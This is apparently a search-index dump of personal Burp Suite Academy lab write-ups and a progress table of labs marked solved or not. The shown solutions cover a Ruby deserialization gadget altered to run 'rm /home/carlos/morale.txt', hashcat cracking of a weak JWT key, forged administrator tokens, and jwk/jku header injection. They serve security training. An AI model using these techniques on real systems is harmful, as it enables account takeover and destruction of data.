        # Burp solution\n1. Log in to your own account and notice that the session cookie contains a serialized (\"marshaled\") Ruby object. Send a request containing this session cookie to Burp Repeater.\n2. Browse the web to find the `Universal Deserialisation Gadget for Ruby 2.x-3.x` by `vakzz` on `devcraft.io`. Copy the final script for generating the payload.\n3. Modify the script as follows:\n    - Change the command that should be executed from `id` to `rm /home/carlos/morale.txt`.\n    - Replace the final two lines with `puts Base64.encode64(payload)`. This ensures that the payload is output in the correct format for you to use for the lab.\n4. Run the script and copy the resulting Base64-encoded object.\n5. In Burp Repeater, replace your session cookie with the malicious one that you just created, then URL encode it.\n6. Send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_7","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_7","title":"Solution","text":"
        # Burp solution\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j_1","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_8","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_8","title":"Solution","text":"
        # Burp solution\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j_2","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_9","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_9","title":"Solution","text":"
        # Burp solution\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-jwt/","title":"BurpSuite Labs - Json Web Token jwt","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-unverified-signature","title":"JWT authentication bypass via unverified signature","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. Due to implementation flaws, the server doesn't verify the signature of any JWTs that it receives.

        To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution","title":"Solution","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-flawed-signature-verification","title":"JWT authentication bypass via flawed signature verification","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_1","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.

        To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_1","title":"Solution","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-weak-signing-key","title":"JWT authentication bypass via weak signing key","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_2","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.

        To solve the lab, first brute-force the website's secret key. Once you've obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_2","title":"Solution","text":"

Capture the JWT of the wiener user and run hashcat with a well-known dictionary of JWT secrets such as https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

        hashcat -a 0 -m 16500 capturedJWT <wordlist>\n

        Results:

        eyJraWQiOiI2YTNmZjdmMi0xMDNmLTQyZGEtYmNkZC0yN2JiZmM4ZTU3OTQiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNDYwMTIyNSwic3ViIjoid2llbmVyIn0.AeWLmJpWTsA-c-dA5j6UHIQ-f9Mo6F9Y-OrXBsGu6Gw:secret1\n
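
The recovered secret (secret1 here) then needs to be Base64-encoded before it can be used as the k value of a new symmetric key in JWT Editor:

echo -n 'secret1' | base64\n# c2VjcmV0MQ==\n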

Open the JWT Editor extension, go to the Keys tab and generate a new symmetric key, using the Base64-encoded secret as the k value.

Send your request to Repeater, go to the JSON Web Token tab, modify the username to administrator, click on Sign and select your key. Modify the endpoint to /admin and send the request.

        Trigger the delete user carlos endpoint:
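
As a sketch, with YOUR-LAB-ID and FORGED-JWT as placeholders, the final request looks like:

curl -i -H \"Cookie: session=FORGED-JWT\" \"https://YOUR-LAB-ID.web-security-academy.net/admin/delete?username=carlos\"\n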

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-jwk-header-injection","title":"JWT authentication bypass via jwk header injection","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_3","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. The server supports the jwk parameter in the JWT header. This is sometimes used to embed the correct verification key directly in the token. However, it fails to check whether the provided key came from a trusted source.

        To solve the lab, modify and sign a JWT that gives you access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_3","title":"Solution","text":"

Capture the wiener JWT and send the GET /admin request to the Repeater module. Once there, generate a new RSA key in the JWT Editor Keys tab, go to the JSON Web Token tab, change the sub claim to administrator, and use Attack > Embedded JWK with that key to sign the token and embed the public key in the jwk header. Then send the request and delete carlos.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-jku-header-injection","title":"JWT authentication bypass via jku header injection","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_4","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. The server supports the jku parameter in the JWT header. However, it fails to check whether the provided URL belongs to a trusted domain before fetching the key.

        To solve the lab, forge a JWT that gives you access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_4","title":"Solution","text":"
        ##### Part 1 - Upload a malicious JWK Set\n\n1. In Burp, load the JWT Editor extension from the BApp store.\n\n2. In the lab, log in to your own account and send the post-login `GET /my-account` request to Burp Repeater.\n\n3. In Burp Repeater, change the path to `/admin` and send the request. Observe that the admin panel is only accessible when logged in as the `administrator` user.\n\n4. Go to the **JWT Editor Keys** tab in Burp's main tab bar.\n\n5. Click **New RSA Key**.\n\n6. In the dialog, click **Generate** to automatically generate a new key pair, then click **OK** to save the key. Note that you don't need to select a key size as this will automatically be updated later.\n\n7. In the browser, go to the exploit server.\n\n8. Replace the contents of the **Body** section with an empty JWK Set as follows:\n\n    `{ \"keys\": [ ] }`\n9. Back on the **JWT Editor Keys** tab, right-click on the entry for the key that you just generated, then select **Copy Public Key as JWK**.\n\n10. Paste the JWK into the `keys` array on the exploit server, then store the exploit. The result should look something like this:\n\n    `{ \"keys\": [ { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"893d8f0b-061f-42c2-a4aa-5056e12b8ae7\", \"n\": \"yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw\" } ] }`\n\n##### Part 2 - Modify and sign the JWT\n\n1. Go back to the `GET /admin` request in Burp Repeater and switch to the extension-generated **JSON Web Token** message editor tab.\n\n2. In the header of the JWT, replace the current value of the `kid` parameter with the `kid` of the JWK that you uploaded to the exploit server.\n\n3. Add a new `jku` parameter to the header of the JWT. Set its value to the URL of your JWK Set on the exploit server.\n\n4. In the payload, change the value of the `sub` claim to `administrator`.\n\n5. At the bottom of the tab, click **Sign**, then select the RSA key that you generated in the previous section.\n\n6. Make sure that the **Don't modify header** option is selected, then click **OK**. The modified token is now signed with the correct signature.\n\n7. Send the request. Observe that you have successfully accessed the admin panel.\n\n8. In the response, find the URL for deleting `carlos` (`/admin/delete?username=carlos`). Send the request to this endpoint to solve the lab.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_5","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_5","title":"Solution","text":"

        I

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b_1","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_6","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_6","title":"Solution","text":"

        I

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b_2","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_7","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_7","title":"Solution","text":"

        I

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-labs/","title":"BurpSuite Labs","text":"","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#sql-injection","title":"SQL injection","text":"Solution SQL injection level link Solved sqli-1 SQL injection Apprentice SQL injection vulnerability in WHERE clause allowing retrieval of hidden data Solved sqli-2 SQL injection Apprentice SQL injection vulnerability allowing login bypass Solved sqli-3 SQL injection Practitioner SQL injection UNION attack, determining the number of columns returned by the query Solved sqli-4 SQL injection Practitioner SQL injection UNION attack, finding a column containing text Solved sqli-5 SQL injection Practitioner SQL injection UNION attack, retrieving data from other tables Solved sqli-6 SQL injection Practitioner SQL injection UNION attack, retrieving multiple values in a single column Solved SQL injection Practitioner SQL injection attack, querying the database type and version on Oracle Not solved SQL injection Practitioner SQL injection attack, querying the database type and version on MySQL and Microsoft Not solved SQL injection Practitioner SQL injection attack, listing the database contents on non-Oracle databases Not solved SQL injection Practitioner SQL injection attack, listing the database contents on Oracle Not solved SQL injection Practitioner Blind SQL injection with conditional responses Not solved SQL injection Practitioner Blind SQL injection with conditional errors Not solved SQL injection Practitioner Blind SQL injection with time delays Not solved SQL injection Practitioner Blind SQL injection with time delays and information retrieval Not solved SQL injection Practitioner Blind SQL injection with out-of-band interaction Not solved SQL injection Practitioner Blind SQL injection with out-of-band data exfiltration Not solved SQL injection Practitioner SQL injection with filter bypass via XML encoding Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-site-scripting","title":"Cross-site scripting","text":"Solution level link Solved Solution xss-1 Cross-site scripting Apprentice Reflected XSS into HTML context with nothing encoded Solved xss-2 Cross-site scripting Apprentice Stored XSS into HTML context with nothing encoded Solved xss-3 Cross-site scripting Apprentice DOM XSS in\u00a0document.write\u00a0sink using source\u00a0location.search Solved xss-4 Cross-site scripting Apprentice DOM XSS in\u00a0innerHTML\u00a0sink using source\u00a0location.search Solved xss-5 Cross-site scripting Apprentice DOM XSS in jQuery anchor\u00a0href\u00a0attribute sink using\u00a0location.search\u00a0source Solved xss-6 Cross-site scripting Apprentice DOM XSS in jQuery selector sink using a hashchange event Solved Cross-site scripting Apprentice Reflected XSS into attribute with angle brackets HTML-encoded Not solved Cross-site scripting Apprentice Stored XSS into anchor\u00a0href\u00a0attribute with double quotes HTML-encoded Not solved Cross-site scripting Apprentice Reflected XSS into a JavaScript string with angle brackets HTML encoded Not solved Cross-site scripting (burpsuite-xss.md) Practitioner DOM XSS in\u00a0document.write\u00a0sink using source\u00a0location.search\u00a0inside a select element Not solved Cross-site scripting Practitioner DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded Not solved Cross-site scripting Practitioner Reflected DOM XSS Not solved Cross-site scripting Practitioner Stored DOM XSS Not 
solved Cross-site scripting Practitioner Exploiting cross-site scripting to steal cookies Not solved Cross-site scripting Practitioner Exploiting cross-site scripting to capture passwords Not solved Cross-site scripting Practitioner Exploiting XSS to perform CSRF Not solved Cross-site scripting Practitioner Reflected XSS into HTML context with most tags and attributes blocked Not solved Cross-site scripting Practitioner Reflected XSS into HTML context with all tags blocked except custom ones Not solved Cross-site scripting Practitioner Reflected XSS with some SVG markup allowed Not solved Cross-site scripting Practitioner Reflected XSS in canonical link tag Not solved Cross-site scripting Practitioner Reflected XSS into a JavaScript string with single quote and backslash escaped Not solved Cross-site scripting Practitioner Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped Not solved Cross-site scripting Practitioner Stored XSS into\u00a0onclick\u00a0event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped Not solved Cross-site scripting Practitioner Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped Not solved Cross-site scripting Expert Reflected XSS with event handlers and\u00a0href\u00a0attributes blocked Not solved Cross-site scripting Expert Reflected XSS in a JavaScript URL with some characters blocked Not solved Cross-site scripting Expert Reflected XSS with AngularJS sandbox escape without strings Not solved Cross-site scripting Expert Reflected XSS with AngularJS sandbox escape and CSP Not solved Cross-site scripting Expert Reflected XSS protected by very strict CSP, with dangling markup attack Not solved Cross-site scripting Expert Reflected XSS protected by CSP, with CSP bypass Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-site-request-forgery","title":"Cross-Site Request Forgery","text":"Cross-site Request Forgery level link Solved Cross-site Request Forgery Apprentice CSRF vulnerability with no defenses Not solved Cross-site Request Forgery Practitioner CSRF where token validation depends on request method Not solved Cross-site Request Forgery Practitioner CSRF where token validation depends on token being present Not solved Cross-site Request Forgery Practitioner CSRF where token is not tied to user session Not solved Cross-site Request Forgery Practitioner CSRF where token is tied to non-session cookie Not solved Cross-site Request Forgery Practitioner CSRF where token is duplicated in cookie Not solved Cross-site Request Forgery Practitioner SameSite Lax bypass via method override Not solved Cross-site Request Forgery Practitioner SameSite Strict bypass via client-side redirect Not solved Cross-site Request Forgery Practitioner SameSite Strict bypass via sibling domain Not solved Cross-site Request Forgery Practitioner SameSite Lax bypass via cookie refresh Not solved Cross-site Request Forgery Practitioner CSRF where Referer validation depends on header being present Not solved Cross-site Request Forgery Practitioner CSRF with broken Referer validation Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#clickjacking","title":"Clickjacking","text":"Clickjacking level link Solved Clickjacking Apprentice Basic clickjacking with CSRF token protection Not
solved Clickjacking Apprentice Clickjacking with form input data prefilled from a URL parameter Not solved Clickjacking Apprentice Clickjacking with a frame buster script Not solved Clickjacking Practitioner Exploiting clickjacking vulnerability to trigger DOM-based XSS Not solved Clickjacking Practitioner Multistep clickjacking Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#dom-based-vulnerabilities","title":"DOM-based vulnerabilities","text":"DOM-based vulnerabilities level link Solved DOM-based vulnerabilities Practitioner DOM XSS using web messages Not solved DOM-based vulnerabilities Practitioner DOM XSS using web messages and a JavaScript URL Not solved DOM-based vulnerabilities Practitioner DOM XSS using web messages and\u00a0JSON.parse Not solved DOM-based vulnerabilities Practitioner DOM-based open redirection Not solved DOM-based vulnerabilities Practitioner DOM-based cookie manipulation Not solved DOM-based vulnerabilities Expert Exploiting DOM clobbering to enable XSS Not solved DOM-based vulnerabilities Expert Clobbering DOM attributes to bypass HTML filters Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-origin-resource-sharing","title":"Cross-origin resource sharing","text":"Cross-origin resource sharing level link Solved Cross-origin resource sharing Apprentice CORS vulnerability with basic origin reflection Not solved Cross-origin resource sharing Apprentice CORS vulnerability with trusted null origin Not solved Cross-origin resource sharing Practitioner CORS vulnerability with trusted insecure protocols Not solved Cross-origin resource sharing Expert CORS vulnerability with internal network pivot attack Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#xml-external-entity","title":"XML external entity","text":"XML external entity level link Solved xxe-1 Apprentice Exploiting XXE using external entities to retrieve files Solved xxe-2 Apprentice Exploiting XXE to perform SSRF attacks Solved xxe-3 Practitioner Blind XXE with out-of-band interaction Solved xxe-4 Practitioner Blind XXE with out-of-band interaction via XML parameter entities Solved xxe-5 Practitioner Exploiting blind XXE to exfiltrate data using a malicious external DTD Solved xxe-6 Practitioner Exploiting blind XXE to retrieve data via error messages Solved xxe-7 Practitioner Exploiting XInclude to retrieve files Solved xxe-8 Practitioner Exploiting XXE via image file upload Solved xxe-9 Expert Exploiting XXE to retrieve data by repurposing a local DTD Solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#server-side-request-forgery","title":"Server-side request forgery","text":"Server-side request forgery level link Solved ssrf-1 Server-side request forgery Apprentice Basic SSRF against the local server Solved ssrf-2 Server-side request forgery Apprentice Basic SSRF against another back-end system Solved ssrf-3 Server-side request forgery Practitioner SSRF with blacklist-based input filter Solved ssrf-4 Server-side request forgery Practitioner SSRF with filter bypass via open redirection vulnerability Not solved Server-side request forgery Practitioner Blind SSRF with out-of-band detection Not solved Server-side request forgery Expert SSRF with whitelist-based input filter Not solved Server-side request forgery Expert Blind SSRF with Shellshock exploitation Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#http-request-smuggling","title":"HTTP request smuggling","text":"HTTP request smuggling level link Solved HTTP request smuggling Practitioner HTTP request smuggling, basic CL.TE vulnerability
Not solved HTTP request smuggling Practitioner HTTP request smuggling, basic TE.CL vulnerability Not solved HTTP request smuggling Practitioner HTTP request smuggling, obfuscating the TE header Not solved HTTP request smuggling Practitioner HTTP request smuggling, confirming a CL.TE vulnerability via differential responses Not solved HTTP request smuggling Practitioner HTTP request smuggling, confirming a TE.CL vulnerability via differential responses Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to reveal front-end request rewriting Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to capture other users' requests Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to deliver reflected XSS Not solved HTTP request smuggling Practitioner Response queue poisoning via H2.TE request smuggling Not solved HTTP request smuggling Practitioner H2.CL request smuggling Not solved HTTP request smuggling Practitioner HTTP/2 request smuggling via CRLF injection Not solved HTTP request smuggling Practitioner HTTP/2 request splitting via CRLF injection Not solved HTTP request smuggling Practitioner CL.0 request smuggling Not solved HTTP request smuggling Expert Exploiting HTTP request smuggling to perform web cache poisoning Not solved HTTP request smuggling Expert Exploiting HTTP request smuggling to perform web cache deception Not solved HTTP request smuggling Expert Bypassing access controls via HTTP/2 request tunnelling Not solved HTTP request smuggling Expert Web cache poisoning via HTTP/2 request tunnelling Not solved HTTP request smuggling Expert Client-side desync Not solved HTTP request smuggling Expert Browser cache poisoning via client-side desync Not solved HTTP request smuggling Expert Server-side pause-based request smuggling Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#os-command-injection","title":"OS command injection","text":"OS command injection level link Solved OS command injection Apprentice OS command injection, simple case Not solved OS command injection Practitioner Blind OS command injection with time delays Not solved OS command injection Practitioner Blind OS command injection with output redirection Not solved OS command injection Practitioner Blind OS command injection with out-of-band interaction Not solved OS command injection Practitioner Blind OS command injection with out-of-band data exfiltration Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#server-side-template-injection","title":"Server-side template injection","text":"Solution Server-side template injection level link Solved ssti-1 Server-side template injection Practitioner Basic server-side template injection Solved ssti-2 Server-side template injection Practitioner Basic server-side template injection (code context) Solved ssti-3 Server-side template injection Practitioner Server-side template injection using documentation Solved ssti-4 Server-side template injection Practitioner Server-side template injection in an unknown language with a documented exploit Solved ssti-5 Server-side template injection Practitioner Server-side template injection with information disclosure via user-supplied 
objects Solved ssti-6 Server-side template injection Expert Server-side template injection in a sandboxed environment Solved Server-side template injection Expert Server-side template injection with a custom exploit Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#directory-traversal","title":"Directory traversal","text":"Directory traversal level link Solved Directory traversal Apprentice File path traversal, simple case Not solved Directory traversal Practitioner File path traversal, traversal sequences blocked with absolute path bypass Not solved Directory traversal Practitioner File path traversal, traversal sequences stripped non-recursively Not solved Directory traversal Practitioner File path traversal, traversal sequences stripped with superfluous URL-decode Not solved Directory traversal Practitioner File path traversal, validation of start of path Not solved Directory traversal Practitioner File path traversal, validation of file extension with null byte bypass Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#access-control-vulnerabilities","title":"Access control vulnerabilities","text":"Solution Access control vulnerabilities level link Solved access-1 Access control vulnerabilities Apprentice Unprotected admin functionality Solved access-2 Access control vulnerabilities Apprentice Unprotected admin functionality with unpredictable URL Solved access-3 Access control vulnerabilities Apprentice User role controlled by request parameter Solved access-4 Access control vulnerabilities Apprentice User role can be modified in user profile Solved access-5 Access control vulnerabilities Apprentice User ID controlled by request parameter Solved access-6 Access control vulnerabilities Apprentice User ID controlled by request parameter, with unpredictable user IDs Solved access-7 Access control vulnerabilities Apprentice User ID controlled by request parameter with data leakage in redirect Solved access-8 Access control vulnerabilities Apprentice User ID controlled by request parameter with password disclosure Solved access-9 Access control vulnerabilities Apprentice Insecure direct object references Solved access-10 Access control vulnerabilities Practitioner URL-based access control can be circumvented Solved access-11 Access control vulnerabilities Practitioner Method-based access control can be circumvented Solved access-12 Access control vulnerabilities Practitioner Multi-step process with no access control on one step Solved access-13 Access control vulnerabilities Practitioner Referer-based access control Solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#authentication","title":"Authentication","text":"Authentication level link Solved Authentication Apprentice Username enumeration via different responses Not solved Authentication Apprentice 2FA simple bypass Not solved Authentication Apprentice Password reset broken logic Not solved Authentication Practitioner Username enumeration via subtly different responses Not solved Authentication Practitioner Username enumeration via response timing Not solved Authentication Practitioner Broken brute-force protection, IP block Not solved Authentication Practitioner Username enumeration via account lock Not solved Authentication Practitioner 2FA broken logic Not solved Authentication Practitioner Brute-forcing a stay-logged-in cookie Not solved Authentication Practitioner Offline password cracking Not solved Authentication Practitioner Password reset poisoning via middleware 
Not solved Authentication Practitioner Password brute-force via password change Not solved Authentication Expert Broken brute-force protection, multiple credentials per request Not solved Authentication Expert 2FA bypass using a brute-force attack Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#websockets","title":"WebSockets","text":"WebSockets level link Solved WebSockets Apprentice Manipulating WebSocket messages to exploit vulnerabilities Not solved WebSockets Practitioner Manipulating the WebSocket handshake to exploit vulnerabilities Not solved WebSockets Practitioner Cross-site WebSocket hijacking Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#web-cache-poisoning","title":"Web cache poisoning","text":"Web cache poisoning level link Solved Web cache poisoning Practitioner Web cache poisoning with an unkeyed header Not solved Web cache poisoning Practitioner Web cache poisoning with an unkeyed cookie Not solved Web cache poisoning Practitioner Web cache poisoning with multiple headers Not solved Web cache poisoning Practitioner Targeted web cache poisoning using an unknown header Not solved Web cache poisoning Practitioner Web cache poisoning via an unkeyed query string Not solved Web cache poisoning Practitioner Web cache poisoning via an unkeyed query parameter Not solved Web cache poisoning Practitioner Parameter cloaking Not solved Web cache poisoning Practitioner Web cache poisoning via a fat GET request Not solved Web cache poisoning Practitioner URL normalization Not solved Web cache poisoning Expert Web cache poisoning to exploit a DOM vulnerability via a cache with strict cacheability criteria Not solved Web cache poisoning Expert Combining web cache poisoning vulnerabilities Not solved Web cache poisoning Expert Cache key injection Not solved Web cache poisoning Expert Internal cache poisoning Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#insecure-deserialization","title":"Insecure deserialization","text":"Insecure deserialization level link Solved Insecure deserialization Apprentice Modifying serialized objects Not solved Insecure deserialization Practitioner Modifying serialized data types Not solved Insecure deserialization Practitioner Using application functionality to exploit insecure deserialization Not solved Insecure deserialization Practitioner Arbitrary object injection in PHP Not solved Insecure deserialization Practitioner Exploiting Java deserialization with Apache Commons Not solved Insecure deserialization Practitioner Exploiting PHP deserialization with a pre-built gadget chain Not solved Insecure deserialization Practitioner Exploiting Ruby deserialization using a documented gadget chain Not solved Insecure deserialization Expert Developing a custom gadget chain for Java deserialization Not solved Insecure deserialization Expert Developing a custom gadget chain for PHP deserialization Not solved Insecure deserialization Expert Using PHAR deserialization to deploy a custom gadget chain Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#information-disclosure","title":"Information disclosure","text":"Information disclosure level link Solved Information disclosure Apprentice Information disclosure in error messages Not solved Information disclosure Apprentice Information disclosure on debug page Not solved Information disclosure Apprentice Source code disclosure via backup files Not solved Information disclosure Apprentice Authentication bypass via information 
disclosure Not solved Information disclosure Practitioner Information disclosure in version control history Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#business-logic-vulnerabilities","title":"Business logic vulnerabilities","text":"Business logic vulnerabilities level link Solved Business logic vulnerabilities Apprentice Excessive trust in client-side controls Not solved Business logic vulnerabilities Apprentice High-level logic vulnerability Not solved Business logic vulnerabilities Apprentice Inconsistent security controls Not solved Business logic vulnerabilities Apprentice Flawed enforcement of business rules Not solved Business logic vulnerabilities Practitioner Low-level logic flaw Not solved Business logic vulnerabilities Practitioner Inconsistent handling of exceptional input Not solved Business logic vulnerabilities Practitioner Weak isolation on dual-use endpoint Not solved Business logic vulnerabilities Practitioner Insufficient workflow validation Not solved Business logic vulnerabilities Practitioner Authentication bypass via flawed state machine Not solved Business logic vulnerabilities Practitioner Infinite money logic flaw Not solved Business logic vulnerabilities Practitioner Authentication bypass via encryption oracle Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#http-host-header-attacks","title":"HTTP Host header attacks","text":"HTTP Host header attacks level link Solved HTTP Host header attacks Apprentice Basic password reset poisoning Not solved HTTP Host header attacks Apprentice Host header authentication bypass Not solved HTTP Host header attacks Practitioner Web cache poisoning via ambiguous requests Not solved HTTP Host header attacks Practitioner Routing-based SSRF Not solved HTTP Host header attacks Practitioner SSRF via flawed request parsing Not solved HTTP Host header attacks Practitioner Host validation bypass via connection state attack Not solved HTTP Host header attacks Expert Password reset poisoning via dangling markup Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#oauth-authentication","title":"OAuth authentication","text":"OAuth authentication level link Solved OAuth authentication Apprentice Authentication bypass via OAuth implicit flow Not solved OAuth authentication Practitioner Forced OAuth profile linking Not solved OAuth authentication Practitioner OAuth account hijacking via redirect_uri Not solved OAuth authentication Practitioner Stealing OAuth access tokens via an open redirect Not solved OAuth authentication Practitioner SSRF via OpenID dynamic client registration Not solved OAuth authentication Expert Stealing OAuth access tokens via a proxy page Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#file-upload-vulnerabilities","title":"File upload vulnerabilities","text":"File upload vulnerabilities level link Solved File upload vulnerabilities Apprentice Remote code execution via web shell upload Not solved File upload vulnerabilities Apprentice Web shell upload via Content-Type restriction bypass Not solved File upload vulnerabilities Practitioner Web shell upload via path traversal Not solved File upload vulnerabilities Practitioner Web shell upload via extension blacklist bypass Not solved File upload vulnerabilities Practitioner Web shell upload via obfuscated file extension Not solved File upload vulnerabilities Practitioner Remote code execution via polyglot web shell upload Not solved File upload vulnerabilities Expert Web shell 
upload via race condition Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#jwt","title":"JWT","text":"JWT level link Solved JWT-1 Apprentice JWT authentication bypass via unverified signature Solved JWT-2 Apprentice JWT authentication bypass via flawed signature verification Solved JWT-3 Practitioner JWT authentication bypass via weak signing key Solved JWT-4 Practitioner JWT authentication bypass via jwk header injection Solved JWT-5 Practitioner JWT authentication bypass via jku header injection Solved Practitioner JWT authentication bypass via kid header path traversal Not solved Expert JWT authentication bypass via algorithm confusion Not solved Expert JWT authentication bypass via algorithm confusion with no exposed key Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#essential-skills","title":"Essential skills","text":"Essential skills level link Solved Essential skills Practitioner Discovering vulnerabilities quickly with targeted scanning Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#prototype-pollution","title":"Prototype pollution","text":"Prototype pollution level link Solved Prototype pollution Practitioner DOM XSS via client-side prototype pollution Not solved Prototype pollution Practitioner DOM XSS via an alternative prototype pollution vector Not solved Prototype pollution Practitioner Client-side prototype pollution in third-party libraries Not solved Prototype pollution Practitioner Client-side prototype pollution via browser APIs Not solved Prototype pollution Practitioner Client-side prototype pollution via flawed sanitization Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-sqli/","title":"BurpSuite Labs - SQL injection","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-vulnerability-in-where-clause-allowing-retrieval-of-hidden-data","title":"SQL injection vulnerability in WHERE clause allowing retrieval of hidden data","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation","title":"Enuntiation","text":"

